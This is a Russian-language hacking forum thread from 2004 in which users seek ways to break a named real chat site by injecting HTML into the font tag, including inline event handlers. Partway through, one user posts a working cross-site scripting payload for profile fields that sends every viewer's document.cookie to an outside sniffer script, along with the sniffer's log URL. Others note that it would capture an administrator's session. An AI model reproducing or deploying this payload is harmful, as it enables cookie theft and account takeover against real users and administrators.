Просмотр полной версии : Фишка в чате
Фишка №1. В чате разрешен тэг font, точнее только font color, но это только кажется . Итак, пишем прямо в тексте сообщения <font color='00ff00" size=6 face=Impact "'>Hi all!</font>. Что получится из этого, думаю, ясно.
А теперь продолжим эту идею: <font color='00ff00" style="font-size:200px;font-family:Impact;background:url(http://бесплатный сервак.ру/картинка.гиф)" "'>Hi all!</font>
Поидее должны получить текст в 200 пикселей с фоновой картинкой.
Проверьте всё ли я правильно написал, скажите ошибки в тегах пожалуйста. Спасибо. Кстати чат asp.
zFailure
07.08.2004, 09:14
линк на чат дай, посмотрим, скажем....
Та прививильно правилльно.
Но я предепочёл бы по лучше способ
<font align=center STYLE='filter:Glow(Color=#FBA2AF);width:200;FONT-SIZE:62px;color:#000000;FONT-FAMILY:arial;background:url(http://image)'>ФРИК</font>
да! и посмотреть чат желательно б!
Ну а если толоко вать уже с тэгом фонт, то он как и любой тэг может использовать событие тоесть <font onclick=alert("Текст...пробел нужно использовать через юни &nbsp;")>ну и т.д. так же как и onmoseower и т.д.
Название чата http://www.ostrovok.net/ вам распечат в html вот смотрите <html>
<head>
<title>Островок.net - Первый чат на Сахалине.</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
<!--
p,td,li { font-family: Arial, Helvetica, sans-serif}
-->
</style>
<script language="JavaScript" src="functions.js"></script>
<script language="JavaScript">
<!---
mtick=0;
utick=0;
function RefreshFrames(a) {
if(a!='auto'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif { top.mess.location.reload(); top.users.location.reload(); }
else {
if(mtick>=39) { top.mess.location.href='http://www.ostrovok.net/mess.php'; mtick=0; }
else { mtick++; }
if(utick>=79) { top.users.location.href='http://www.ostrovok.net/users.php'; utick=0; }
else { utick++; }
}
window.setTimeout("RefreshFrames('auto'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif",1000);
}
//-->
</SCRIPT>
</head>
<frameset rows="*,110" frameborder="No" framespacing=0 bordercolor="#000000" border=0 onLoad="javascript:RefreshFrames('auto'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif;"">
<frameset cols="*,200">
<frame name="mess" scrolling="yes" src="mess.php" frameborder=0 marginheight=0 marginwidth=0>
<frame name="users" src="users.php" frameborder=0 marginheight=0 marginwidth=0>
</frameset>
<frame name="input" scrolling="NO" noresize frameborder=0 marginheight=0 marginwidth=0
src="input.php?&str=">
</frameset>
<noframes><body bgcolor="#FFFFFF"><br>
Your browser not support frames.
</body></noframes>
</html>
я вставил в текст <font align=center STYLE='filter:Glow(Color=#FBA2AF);width:200;FONT-SIZE:62px;color:#000000;FONT-FAMILY:arial;background:url(http://image)'>ФРИК</font>
В тексте появилось только слово Фрик и что это значит вообщем помогите поломать чат.
Короче, так просто всё не выйдет, вы и так уже всё сами поняли.
И с чего вы взяли, что он фонт колор пропускает?
Незнаю может пропускает а что пропускает подскажите пожалуйстка. Как его поломать.
zFailure
10.08.2004, 11:47
если в своей инфе указать
URL http://z.ru`" z=`
А о себе ` style="background:url(javascript:x=new Image()\;x.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie)" z
то любой кто просмотрит вашу инфу в чате
становятся вашими невольными жертвами
http://antichat.ru/sniff/log.php
А поломать такой чат возможно?
Че Гевара
10.08.2004, 22:00
Это и есть взлом ..
Че Гевара а точнее?
2Lya-Lya
Che xochet skazat chto vnedreniye takogo scripta eto uje samo-saboy tak skazat vzlom chata http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif ved yesli admin toje posmotrit infu to togda http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif http://forum.antichat.ru/iB_html/non-cgi/emoticons/devil.gif
Pravilno Che Gevara? http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Че Гевара
27.08.2004, 15:26
Absolutno verno ... http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif
lolz http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot